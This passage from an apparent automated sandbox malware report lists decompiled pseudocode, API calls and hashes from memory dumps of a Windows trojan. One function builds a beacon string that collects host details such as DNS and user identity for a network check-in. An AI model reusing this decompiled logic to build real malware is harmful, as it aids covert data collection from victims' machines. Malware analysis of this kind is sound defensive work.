                						__eflags = _t75 - _t108;
                						if(_t75 >= _t108) {
                							goto L20;
                						}
                						goto L15;
                					}
                					L5:
                					_t63 = 1;
                					goto L60;
                				} else {
                					goto L3;
                				}
                			}

                APIs
                • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6E242456
                Memory Dump Source
                • Source File: 00000000.00000002.480384198.000000006E241000.00000020.00020000.sdmp, Offset: 6E240000, based on PE: true
                • Associated: 00000000.00000002.480363344.000000006E240000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.480398487.000000006E243000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.480413214.000000006E245000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.480434274.000000006E246000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MemoryQueryVirtual
                • String ID:
                • API String ID: 2850889275-0
                • Opcode ID: 3749f90489161342130d29cacf5086b3b0ed7cf7d46fa9d4767ebdcdb8552f92
                • Instruction ID: 84c12721b237ee1db9367d045dbb4232dec5c407d70a88b65e3855909b44c3f4
                • Opcode Fuzzy Hash: 3749f90489161342130d29cacf5086b3b0ed7cf7d46fa9d4767ebdcdb8552f92
                • Instruction Fuzzy Hash: 9161C1F2614A0FCFEB5DCFABD8A0A5977B7EB45355B248428D816C7184FB30D882C660
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E001DB2F1(long _a4) {
                				intOrPtr _v8;
                				intOrPtr _v12;
                				signed int _v16;
                				short* _v32;
                				void _v36;
                				void* _t57;
                				signed int _t58;
                				signed int _t61;
                				signed int _t62;
                				void* _t63;
                				signed int* _t68;
                				intOrPtr* _t69;
                				intOrPtr* _t71;
                				intOrPtr _t72;
                				intOrPtr _t75;
                				void* _t76;
                				signed int _t77;
                				void* _t78;
                				void _t80;
                				signed int _t81;
                				signed int _t84;
                				signed int _t86;
                				short* _t87;
                				void* _t89;
                				signed int* _t90;
                				long _t91;
                				signed int _t93;
                				signed int _t94;
                				signed int _t100;
                				signed int _t102;
                				void* _t104;
                				long _t108;
                				signed int _t110;
                
                				_t108 = _a4;
                				_t76 =  *(_t108 + 8);
                				if((_t76 & 0x00000003) != 0) {
                					L3:
                					return 0;
                				}
                				_a4 =  *[fs:0x4];
                				_v8 =  *[fs:0x8];
                				if(_t76 < _v8 || _t76 >= _a4) {
                					_t102 =  *(_t108 + 0xc);
                					__eflags = _t102 - 0xffffffff;
                					if(_t102 != 0xffffffff) {
                						_t91 = 0;
                						__eflags = 0;
                						_a4 = 0;
                						_t57 = _t76;
                						do {
                							_t80 =  *_t57;
                							__eflags = _t80 - 0xffffffff;
                							if(_t80 == 0xffffffff) {
                								goto L9;
                							}
                							__eflags = _t80 - _t91;
                							if(_t80 >= _t91) {
                								L20:
                								_t63 = 0;
                								L60:
                								return _t63;
                							}
                							L9:
                							__eflags =  *(_t57 + 4);
                							if( *(_t57 + 4) != 0) {
                								_t12 =  &_a4;
                								 *_t12 = _a4 + 1;
                								__eflags =  *_t12;
                							}
                							_t91 = _t91 + 1;
                							_t57 = _t57 + 0xc;
                							__eflags = _t91 - _t102;
                						} while (_t91 <= _t102);
                						__eflags = _a4;
                						if(_a4 == 0) {
                							L15:
                							_t81 =  *0x1dd2e0; // 0x0
                							_t110 = _t76 & 0xfffff000;
                							_t58 = 0;
                							__eflags = _t81;
                							if(_t81 <= 0) {
                								L18:
                								_t104 = _t102 | 0xffffffff;
                								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                								__eflags = _t61;
                								if(_t61 < 0) {
                									_t62 = 0;
                									__eflags = 0;
                								} else {
                									_t62 = _a4;
                								}
                								__eflags = _t62;
                								if(_t62 == 0) {
                									L59:
                									_t63 = _t104;
                									goto L60;
                								} else {
                									__eflags = _v12 - 0x1000000;
                									if(_v12 != 0x1000000) {
                										goto L59;
                									}
                									__eflags = _v16 & 0x000000cc;
                									if((_v16 & 0x000000cc) == 0) {
                										L46:
                										_t63 = 1;
                										 *0x1dd328 = 1;
                										__eflags =  *0x1dd328;
                										if( *0x1dd328 != 0) {
                											goto L60;
                										}
                										_t84 =  *0x1dd2e0; // 0x0
                										__eflags = _t84;
                										_t93 = _t84;
                										if(_t84 <= 0) {
                											L51:
                											__eflags = _t93;
                											if(_t93 != 0) {
                												L58:
                												 *0x1dd328 = 0;
                												goto L5;
                											}
                											_t77 = 0xf;
                											__eflags = _t84 - _t77;
                											if(_t84 <= _t77) {
                												_t77 = _t84;
                											}
                											_t94 = 0;
                											__eflags = _t77;
                											if(_t77 < 0) {
                												L56:
                												__eflags = _t84 - 0x10;
                												if(_t84 < 0x10) {
                													_t86 = _t84 + 1;
                													__eflags = _t86;
                													 *0x1dd2e0 = _t86;
                												}
                												goto L58;
                											} else {
                												do {
                													_t68 = 0x1dd2e8 + _t94 * 4;
                													_t94 = _t94 + 1;
                													__eflags = _t94 - _t77;
                													 *_t68 = _t110;
                													_t110 =  *_t68;
                												} while (_t94 <= _t77);
                												goto L56;
                											}
                										}
                										_t69 = 0x1dd2e4 + _t84 * 4;
                										while(1) {
                											__eflags =  *_t69 - _t110;
                											if( *_t69 == _t110) {
                												goto L51;
                											}
                											_t93 = _t93 - 1;
                											_t69 = _t69 - 4;
                											__eflags = _t93;
                											if(_t93 > 0) {
                												continue;
                											}
                											goto L51;
                										}
                										goto L51;
                									}
                									_t87 = _v32;
                									__eflags =  *_t87 - 0x5a4d;
                									if( *_t87 != 0x5a4d) {
                										goto L59;
                									}
                									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                									__eflags =  *_t71 - 0x4550;
                									if( *_t71 != 0x4550) {
                										goto L59;
                									}
                									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                										goto L59;
                									}
                									_t78 = _t76 - _t87;
                									__eflags =  *((short*)(_t71 + 6));
                									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                									if( *((short*)(_t71 + 6)) <= 0) {
                										goto L59;
                									}
                									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                									__eflags = _t78 - _t72;
                									if(_t78 < _t72) {
                										goto L46;
                									}
                									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                										goto L46;
                									}
                									__eflags =  *(_t89 + 0x27) & 0x00000080;
                									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                										goto L20;
                									}
                									goto L46;
                								}
                							} else {
                								goto L16;
                							}
                							while(1) {
                								L16:
                								__eflags =  *((intOrPtr*)(0x1dd2e8 + _t58 * 4)) - _t110;
                								if( *((intOrPtr*)(0x1dd2e8 + _t58 * 4)) == _t110) {
                									break;
                								}
                								_t58 = _t58 + 1;
                								__eflags = _t58 - _t81;
                								if(_t58 < _t81) {
                									continue;
                								}
                								goto L18;
                							}
                							__eflags = _t58;
                							if(_t58 <= 0) {
                								goto L5;
                							}
                							 *0x1dd328 = 1;
                							__eflags =  *0x1dd328;
                							if( *0x1dd328 != 0) {
                								goto L5;
                							}
                							__eflags =  *((intOrPtr*)(0x1dd2e8 + _t58 * 4)) - _t110;
                							if( *((intOrPtr*)(0x1dd2e8 + _t58 * 4)) == _t110) {
                								L32:
                								_t100 = 0;
                								__eflags = _t58;
                								if(_t58 < 0) {
                									L34:
                									 *0x1dd328 = 0;
                									goto L5;
                								} else {
                									goto L33;
                								}
                								do {
                									L33:
                									_t90 = 0x1dd2e8 + _t100 * 4;
                									_t100 = _t100 + 1;
                									__eflags = _t100 - _t58;
                									 *_t90 = _t110;
                									_t110 =  *_t90;
                								} while (_t100 <= _t58);
                								goto L34;
                							}
                							_t25 = _t81 - 1; // -1
                							_t58 = _t25;
                							__eflags = _t58;
                							if(_t58 < 0) {
                								L28:
                								__eflags = _t81 - 0x10;
                								if(_t81 < 0x10) {
                									_t81 = _t81 + 1;
                									__eflags = _t81;
                									 *0x1dd2e0 = _t81;
                								}
                								_t28 = _t81 - 1; // 0x0
                								_t58 = _t28;
                								goto L32;
                							} else {
                								goto L25;
                							}
                							while(1) {
                								L25:
                								__eflags =  *((intOrPtr*)(0x1dd2e8 + _t58 * 4)) - _t110;
                								if( *((intOrPtr*)(0x1dd2e8 + _t58 * 4)) == _t110) {
                									break;
                								}
                								_t58 = _t58 - 1;
                								__eflags = _t58;
                								if(_t58 >= 0) {
                									continue;
                								}
                								break;
                							}
                							__eflags = _t58;
                							if(__eflags >= 0) {
                								if(__eflags == 0) {
                									goto L34;
                								}
                								goto L32;
                							}
                							goto L28;
                						}
                						_t75 =  *((intOrPtr*)(_t108 - 8));
                						__eflags = _t75 - _v8;
                						if(_t75 < _v8) {
                							goto L20;
                						}
                						__eflags = _t75 - _t108;
                						if(_t75 >= _t108) {
                							goto L20;
                						}
                						goto L15;
                					}
                					L5:
                					_t63 = 1;
                					goto L60;
                				} else {
                					goto L3;
                				}
                			}





































                APIs
                • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 001DB3A2
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: MemoryQueryVirtual
                • String ID:
                • API String ID: 2850889275-0
                • Opcode ID: 45cb675d8c484d481f01a33e02f433d40c83f97fe9d38c95d3e04eba8e8989dd
                • Instruction ID: 6886bf46c03c7ef1e2ed1cdb87400ecf11c165337ba49592ac7560da8aaa5eda
                • Opcode Fuzzy Hash: 45cb675d8c484d481f01a33e02f433d40c83f97fe9d38c95d3e04eba8e8989dd
                • Instruction Fuzzy Hash: 9761F230A09212EBCB29CF29E8D063A73A1FB85354B66813BD847C7395E730DC82DB44
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 71%
                			E6E242184(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                				intOrPtr _v8;
                				char _v12;
                				void* __ebp;
                				signed int* _t43;
                				char _t44;
                				void* _t46;
                				void* _t49;
                				intOrPtr* _t53;
                				void* _t54;
                				void* _t65;
                				long _t66;
                				signed int* _t80;
                				signed int* _t82;
                				void* _t84;
                				signed int _t86;
                				void* _t89;
                				void* _t95;
                				void* _t96;
                				void* _t99;
                				void* _t106;
                
                				_t43 = _t84;
                				_t65 = __ebx + 2;
                				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                				_t89 = _t95;
                				_t96 = _t95 - 8;
                				_push(_t65);
                				_push(_t84);
                				_push(_t89);
                				asm("cld");
                				_t66 = _a8;
                				_t44 = _a4;
                				if(( *(_t44 + 4) & 0x00000006) != 0) {
                					_push(_t89);
                					E6E2422EB(_t66 + 0x10, _t66, 0xffffffff);
                					_t46 = 1;
                				} else {
                					_v12 = _t44;
                					_v8 = _a12;
                					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                					_t86 =  *(_t66 + 0xc);
                					_t80 =  *(_t66 + 8);
                					_t49 = E6E2423A5(_t66);
                					_t99 = _t96 + 4;
                					if(_t49 == 0) {
                						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                						goto L11;
                					} else {
                						while(_t86 != 0xffffffff) {
                							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                							if(_t53 == 0) {
                								L8:
                								_t80 =  *(_t66 + 8);
                								_t86 = _t80[_t86 + _t86 * 2];
                								continue;
                							} else {
                								_t54 =  *_t53();
                								_t89 = _t89;
                								_t86 = _t86;
                								_t66 = _a8;
                								_t55 = _t54;
                								_t106 = _t54;
                								if(_t106 == 0) {
                									goto L8;
                								} else {
                									if(_t106 < 0) {
                										_t46 = 0;
                									} else {
                										_t82 =  *(_t66 + 8);
                										E6E242290(_t55, _t66);
                										_t89 = _t66 + 0x10;
                										E6E2422EB(_t89, _t66, 0);
                										_t99 = _t99 + 0xc;
                										E6E242387(_t82[2], 1);
                										 *(_t66 + 0xc) =  *_t82;
                										_t66 = 0;
                										_t86 = 0;
                										 *(_t82[2])();
                										goto L8;
                									}
                								}
                							}
                							goto L13;
                						}
                						L11:
                						_t46 = 1;
                					}
                				}
                				L13:
                				return _t46;
                			}


                Memory Dump Source
                • Source File: 00000000.00000002.480384198.000000006E241000.00000020.00020000.sdmp, Offset: 6E240000, based on PE: true
                • Associated: 00000000.00000002.480363344.000000006E240000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.480398487.000000006E243000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.480413214.000000006E245000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.480434274.000000006E246000.00000002.00020000.sdmp
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                • Instruction ID: 8b69f22701550772ae3ac4672f66ccbf7e7b83a2c97b503ba86b16b1ca9e8669
                • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                • Instruction Fuzzy Hash: F721B6B790020ADFD704DFAADC809A7BBAAFF49350B0585A8D919DB245D730FA15C7E0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 71%
                			E001DB0CC(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                				intOrPtr _v8;
                				char _v12;
                				void* __ebp;
                				signed int* _t43;
                				char _t44;
                				void* _t46;
                				void* _t49;
                				intOrPtr* _t53;
                				void* _t54;
                				void* _t65;
                				long _t66;
                				signed int* _t80;
                				signed int* _t82;
                				void* _t84;
                				signed int _t86;
                				void* _t89;
                				void* _t95;
                				void* _t96;
                				void* _t99;
                				void* _t106;
                
                				_t43 = _t84;
                				_t65 = __ebx + 2;
                				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                				_t89 = _t95;
                				_t96 = _t95 - 8;
                				_push(_t65);
                				_push(_t84);
                				_push(_t89);
                				asm("cld");
                				_t66 = _a8;
                				_t44 = _a4;
                				if(( *(_t44 + 4) & 0x00000006) != 0) {
                					_push(_t89);
                					E001DB237(_t66 + 0x10, _t66, 0xffffffff);
                					_t46 = 1;
                				} else {
                					_v12 = _t44;
                					_v8 = _a12;
                					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                					_t86 =  *(_t66 + 0xc);
                					_t80 =  *(_t66 + 8);
                					_t49 = E001DB2F1(_t66);
                					_t99 = _t96 + 4;
                					if(_t49 == 0) {
                						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                						goto L11;
                					} else {
                						while(_t86 != 0xffffffff) {
                							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                							if(_t53 == 0) {
                								L8:
                								_t80 =  *(_t66 + 8);
                								_t86 = _t80[_t86 + _t86 * 2];
                								continue;
                							} else {
                								_t54 =  *_t53();
                								_t89 = _t89;
                								_t86 = _t86;
                								_t66 = _a8;
                								_t55 = _t54;
                								_t106 = _t54;
                								if(_t106 == 0) {
                									goto L8;
                								} else {
                									if(_t106 < 0) {
                										_t46 = 0;
                									} else {
                										_t82 =  *(_t66 + 8);
                										E001DB1DC(_t55, _t66);
                										_t89 = _t66 + 0x10;
                										E001DB237(_t89, _t66, 0);
                										_t99 = _t99 + 0xc;
                										E001DB2D3(_t82[2]);
                										 *(_t66 + 0xc) =  *_t82;
                										_t66 = 0;
                										_t86 = 0;
                										 *(_t82[2])(1);
                										goto L8;
                									}
                								}
                							}
                							goto L13;
                						}
                						L11:
                						_t46 = 1;
                					}
                				}
                				L13:
                				return _t46;
                			}


                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                • Instruction ID: 2b5cd1ae7ea42c1643ec1ed6e504827795fb704a42e2e8ccea90491d92f5bb04
                • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                • Instruction Fuzzy Hash: E121D672904204EFCB10EF69C8D19ABB7A5FF44350B478569E8169B345D730F915CBE0
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.480938016.000000006E2B5000.00000040.00020000.sdmp, Offset: 6E2B5000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                • Instruction ID: a4250ecb91f2d0e0442a4b444d6d90b5e5cabf007552f291ea6bea7a0520f8ce
                • Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                • Instruction Fuzzy Hash: 3C1181737806059FD754CE99EC90E92B39BEB992747298066ED04CF305E676E841C760
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.480938016.000000006E2B5000.00000040.00020000.sdmp, Offset: 6E2B5000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
                • Instruction ID: 9bc7ffd5cc2ff2433024137912339952aed0afd214d0e7945aa0dce51622cd7e
                • Opcode Fuzzy Hash: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
                • Instruction Fuzzy Hash: 0D01F5373A420ACFD704CB6DD894D69B7EAEBC1369B15807EC446CBA15E234E842C520
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 66%
                			E001D2941(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
                				intOrPtr _v0;
                				intOrPtr _v4;
                				intOrPtr _v16;
                				intOrPtr _v24;
                				intOrPtr _v28;
                				void* _v44;
                				intOrPtr _v52;
                				void* __edi;
                				long _t25;
                				intOrPtr _t26;
                				intOrPtr _t27;
                				intOrPtr _t28;
                				intOrPtr _t29;
                				intOrPtr _t30;
                				void* _t33;
                				intOrPtr _t34;
                				int _t37;
                				intOrPtr _t42;
                				intOrPtr _t43;
                				intOrPtr _t50;
                				intOrPtr _t54;
                				intOrPtr* _t56;
                				intOrPtr _t62;
                				intOrPtr _t68;
                				intOrPtr _t71;
                				intOrPtr _t74;
                				int _t77;
                				intOrPtr _t78;
                				int _t81;
                				intOrPtr _t83;
                				int _t86;
                				intOrPtr* _t89;
                				intOrPtr* _t90;
                				void* _t91;
                				void* _t95;
                				void* _t96;
                				void* _t97;
                				intOrPtr _t98;
                				void* _t100;
                				int _t101;
                				void* _t102;
                				void* _t103;
                				void* _t105;
                				void* _t106;
                				void* _t108;
                
                				_t95 = __edx;
                				_t91 = __ecx;
                				_t25 = __eax;
                				_t105 = _a16;
                				_v4 = 8;
                				if(__eax == 0) {
                					_t25 = GetTickCount();
                				}
                				_t26 =  *0x1dd018; // 0xd1eb352c
                				asm("bswap eax");
                				_t27 =  *0x1dd014; // 0x3a87c8cd
                				asm("bswap eax");
                				_t28 =  *0x1dd010; // 0xd8d2f808
                				asm("bswap eax");
                				_t29 = E001DD00C; // 0xeec43f25
                				asm("bswap eax");
                				_t30 =  *0x1dd2a4; // 0x2dca5a8
                				_t3 = _t30 + 0x1de633; // 0x74666f73
                				_t101 = wsprintfA(_t105, _t3, 2, 0x3d154, _t29, _t28, _t27, _t26, E001DD02C,  *0x1dd004, _t25);
                				_t33 = E001D2914();
                				_t34 =  *0x1dd2a4; // 0x2dca5a8
                				_t4 = _t34 + 0x1de673; // 0x74707526
                				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
                				_t108 = _t106 + 0x38;
                				_t102 = _t101 + _t37;
                				_t96 = E001D3F0E(_t91);
                				if(_t96 != 0) {
                					_t83 =  *0x1dd2a4; // 0x2dca5a8
                					_t6 = _t83 + 0x1de8eb; // 0x736e6426
                					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
                					_t108 = _t108 + 0xc;
                					_t102 = _t102 + _t86;
                					HeapFree( *0x1dd238, 0, _t96);
                				}
                				_t97 = E001D1363();
                				if(_t97 != 0) {
                					_t78 =  *0x1dd2a4; // 0x2dca5a8
                					_t8 = _t78 + 0x1de8f3; // 0x6f687726
                					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
                					_t108 = _t108 + 0xc;
                					_t102 = _t102 + _t81;
                					HeapFree( *0x1dd238, 0, _t97);
                				}
                				_t98 =  *0x1dd32c; // 0x2fa95b0
                				_a32 = E001D18D5(0x1dd00a, _t98 + 4);
                				_t42 =  *0x1dd2cc; // 0x0
                				if(_t42 != 0) {
                					_t74 =  *0x1dd2a4; // 0x2dca5a8
                					_t11 = _t74 + 0x1de8cd; // 0x3d736f26
                					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
                					_t108 = _t108 + 0xc;
                					_t102 = _t102 + _t77;
                				}
                				_t43 =  *0x1dd2c8; // 0x0
                				if(_t43 != 0) {
                					_t71 =  *0x1dd2a4; // 0x2dca5a8
                					_t13 = _t71 + 0x1de8c6; // 0x3d706926
                					wsprintfA(_t102 + _t105, _t13, _t43);
                				}
                				if(_a32 != 0) {
                					_t100 = RtlAllocateHeap( *0x1dd238, 0, 0x800);
                					if(_t100 != 0) {
                						E001D6852(GetTickCount());
                						_t50 =  *0x1dd32c; // 0x2fa95b0
                						__imp__(_t50 + 0x40);
                						asm("lock xadd [eax], ecx");
                						_t54 =  *0x1dd32c; // 0x2fa95b0
                						__imp__(_t54 + 0x40);
                						_t56 =  *0x1dd32c; // 0x2fa95b0
                						_t103 = E001D8840(1, _t95, _t105,  *_t56);
                						asm("lock xadd [eax], ecx");
                						if(_t103 != 0) {
                							StrTrimA(_t103, 0x1dc2ac);
                							_push(_t103);
                							_t62 = E001D8007();
                							_v16 = _t62;
                							if(_t62 != 0) {
                								_t89 = __imp__;
                								 *_t89(_t103, _v0);
                								 *_t89(_t100, _a4);
                								_t90 = __imp__;
                								 *_t90(_t100, _v28);
                								 *_t90(_t100, _t103);
                								_t68 = E001D6146(0xffffffffffffffff, _t100, _v28, _v24);
                								_v52 = _t68;
                								if(_t68 != 0 && _t68 != 0x10d2) {
                									E001D45F1();
                								}
                								HeapFree( *0x1dd238, 0, _v44);
                							}
                							HeapFree( *0x1dd238, 0, _t103);
                						}
                						HeapFree( *0x1dd238, 0, _t100);
                					}
                					HeapFree( *0x1dd238, 0, _a24);
                				}
                				HeapFree( *0x1dd238, 0, _t105);
                				return _a12;
                			}


                APIs
                • GetTickCount.KERNEL32 ref: 001D2958
                • wsprintfA.USER32 ref: 001D29A5
                • wsprintfA.USER32 ref: 001D29C2
                • wsprintfA.USER32 ref: 001D29E5
                • HeapFree.KERNEL32(00000000,00000000), ref: 001D29F5
                • wsprintfA.USER32 ref: 001D2A17
                • HeapFree.KERNEL32(00000000,00000000), ref: 001D2A27
                • wsprintfA.USER32 ref: 001D2A5E
                • wsprintfA.USER32 ref: 001D2A7E
                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001D2A9B
                • GetTickCount.KERNEL32 ref: 001D2AAB
                • RtlEnterCriticalSection.NTDLL(02FA9570), ref: 001D2ABF
                • RtlLeaveCriticalSection.NTDLL(02FA9570), ref: 001D2ADD
                  • Part of subcall function 001D8840: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,001D2AF0,?,02FA95B0), ref: 001D886B
                  • Part of subcall function 001D8840: lstrlen.KERNEL32(?,?,?,001D2AF0,?,02FA95B0), ref: 001D8873
                  • Part of subcall function 001D8840: strcpy.NTDLL ref: 001D888A
                  • Part of subcall function 001D8840: lstrcat.KERNEL32(00000000,?), ref: 001D8895
                  • Part of subcall function 001D8840: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,001D2AF0,?,02FA95B0), ref: 001D88B2
                • StrTrimA.SHLWAPI(00000000,001DC2AC,?,02FA95B0), ref: 001D2B0F
                  • Part of subcall function 001D8007: lstrlen.KERNEL32(02FA9918,00000000,00000000,7742C740,001D2B1B,00000000), ref: 001D8017
                  • Part of subcall function 001D8007: lstrlen.KERNEL32(?), ref: 001D801F
                  • Part of subcall function 001D8007: lstrcpy.KERNEL32(00000000,02FA9918), ref: 001D8033
                  • Part of subcall function 001D8007: lstrcat.KERNEL32(00000000,?), ref: 001D803E
                • lstrcpy.KERNEL32(00000000,?), ref: 001D2B2E
                • lstrcpy.KERNEL32(00000000,00000000), ref: 001D2B35
                • lstrcat.KERNEL32(00000000,?), ref: 001D2B42
                • lstrcat.KERNEL32(00000000,00000000), ref: 001D2B46
                  • Part of subcall function 001D6146: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74B481D0), ref: 001D61F8
                • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 001D2B76
                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D2B85
                • HeapFree.KERNEL32(00000000,00000000,?,02FA95B0), ref: 001D2B94
                • HeapFree.KERNEL32(00000000,00000000), ref: 001D2BA6
                • HeapFree.KERNEL32(00000000,?), ref: 001D2BB5
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                • String ID:
                • API String ID: 3080378247-0
                • Opcode ID: fc9b350bca0062f0518be227d968482b2bf9be8088d338dceb333b7857de0b08
                • Instruction ID: cb2462daad67176db176e2e6ae9521e67cce951e1e7f41ba590d23be8ee83113
                • Opcode Fuzzy Hash: fc9b350bca0062f0518be227d968482b2bf9be8088d338dceb333b7857de0b08
                • Instruction Fuzzy Hash: 9C619F71503202AFC721ABA8EC84F667BE8EF88350F040517F948D7671DB35E985DB65
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.480497623.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false
                Similarity
                • API ID: _strncmp
                • String ID:
                • API String ID: 909875538-0
                • Opcode ID: c444bfdbbaf6dd546ba66a4cabcb92db74929d0173adcdc962e52be3aa016cb8
                • Instruction ID: aef3cef9f04ad0ae90455034eb7005d4b5b2cd982321898dfad2d7607ca95451
                • Opcode Fuzzy Hash: c444bfdbbaf6dd546ba66a4cabcb92db74929d0173adcdc962e52be3aa016cb8
                • Instruction Fuzzy Hash: 9D41E9ABB4651933F2605BC9AD02F8BA6176BF0756F048422EB44DA2C4F334D82DC7E0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 27%
                			E001D4744(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                				intOrPtr _v8;
                				intOrPtr _v12;
                				long _v16;
                				intOrPtr _v20;
                				signed int _v24;
                				void* __esi;
                				long _t43;
                				intOrPtr _t44;
                				intOrPtr _t46;
                				void* _t48;
                				void* _t49;
                				void* _t50;
                				intOrPtr _t54;
                				intOrPtr _t57;
                				void* _t58;
                				void* _t59;
                				void* _t60;
                				intOrPtr _t66;
                				void* _t71;
                				void* _t74;
                				intOrPtr _t75;
                				void* _t77;
                				intOrPtr _t79;
                				intOrPtr* _t80;
                				intOrPtr _t91;
                
                				_t79 =  *0x1dd33c; // 0x2fa9bc8
                				_v24 = 8;
                				_t43 = GetTickCount();
                				_push(5);
                				_t74 = 0xa;
                				_v16 = _t43;
                				_t44 = E001D66E7(_t74,  &_v16);
                				_v8 = _t44;
                				if(_t44 == 0) {
                					_v8 = 0x1dc1ac;
                				}
                				_t46 = E001D92DB(_t79);
                				_v12 = _t46;
                				if(_t46 != 0) {
                					_t80 = __imp__;
                					_t48 =  *_t80(_v8, _t71);
                					_t49 =  *_t80(_v12);
                					_t50 =  *_t80(_a4);
                					_t54 = E001D7E20(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
                					_v20 = _t54;
                					if(_t54 != 0) {
                						_t75 =  *0x1dd2a4; // 0x2dca5a8
                						_t16 = _t75 + 0x1deb28; // 0x530025
                						 *0x1dd11c(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
                						_push(4);
                						_t77 = 5;
                						_t57 = E001D66E7(_t77,  &_v16);
                						_v8 = _t57;
                						if(_t57 == 0) {
                							_v8 = 0x1dc1b0;
                						}
                						_t58 =  *_t80(_v8);
                						_t59 =  *_t80(_v12);
